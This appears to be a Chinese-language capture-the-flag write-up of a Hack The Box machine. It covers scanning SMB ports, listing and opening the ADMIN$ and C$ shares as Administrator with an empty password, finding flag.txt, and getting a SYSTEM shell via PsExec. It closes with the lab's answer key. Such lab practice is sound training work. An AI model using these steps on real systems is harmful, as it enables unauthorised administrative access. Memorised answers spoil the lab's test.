很简单的smb重复实践
信息收集
日常扫描,和 HTB_Dancing
靶机所涉及的服务一致,上次是讲的 smb
服务
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
连接 smb
端口,测试 root
和空密码都报错,百度后说这是因为执行 smbclient
命令的用户 ID
没有成为 samba
服务的用户,我们添加用户名,空密码
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares 1 ⨯
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_IO_TIMEOUT
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares -U Administrator
Enter WORKGROUP\Administrator's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
分别连接测试
┌──(root💀kali)-[~]
└─# smbclient //10.129.69.58/ADMIN$ -U Administrator 130 ⨯
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
实践
话说,这么多文件可不可以搜索呢? 没找到,只能翻,但是还是可以猜测比较常用的敏感文件路径,最后在 C:/Users/Administrator/Desktop
下找到 flag.txt
文件
里面还提到了一个 PsExec
登录获取 shell
的,这是一个 windows
系统自带的工具,到官网去下载 👉psexec下载, -s
是获取管理员权限,成功
PS E:\PSTools> .\PsExec.exe \\10.129.69.58 -u Administrator -s cmd
使用 type
查看目标文件
答案
-Pn //使用禁ping命令扫描
Server Message Block
445
-L
$
C$
get
psexec.py